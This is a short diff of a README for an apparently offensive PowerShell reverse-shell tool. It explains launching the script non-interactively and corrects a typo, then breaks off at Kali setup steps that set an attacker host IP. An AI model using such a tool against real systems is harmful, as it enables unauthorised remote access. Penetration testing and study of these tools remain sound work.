rtaylor777/ps_cmd_rev_shell/README.md

 The script is intended to be launched with the -NonI (non interactive) option of powershell.
 The result of not running it like this is that PowerShell will try to interactively prompt for missing parameters and your shell will be locked up.
 As a result of the -NonI option, if you fail to provide the required parameters to a PowerShell command you will not see any error messages, the command simply will not work.
 So if you are having issues with a command's syntax, be sure to test on your own Windows system from an interactive PowerShell prompt.

-## Less Preferred Method of Invokation
+## Less Preferred Method of Invocation

  **On Kali:**<br />
 export HOSTIP=10.0.0.22;<br />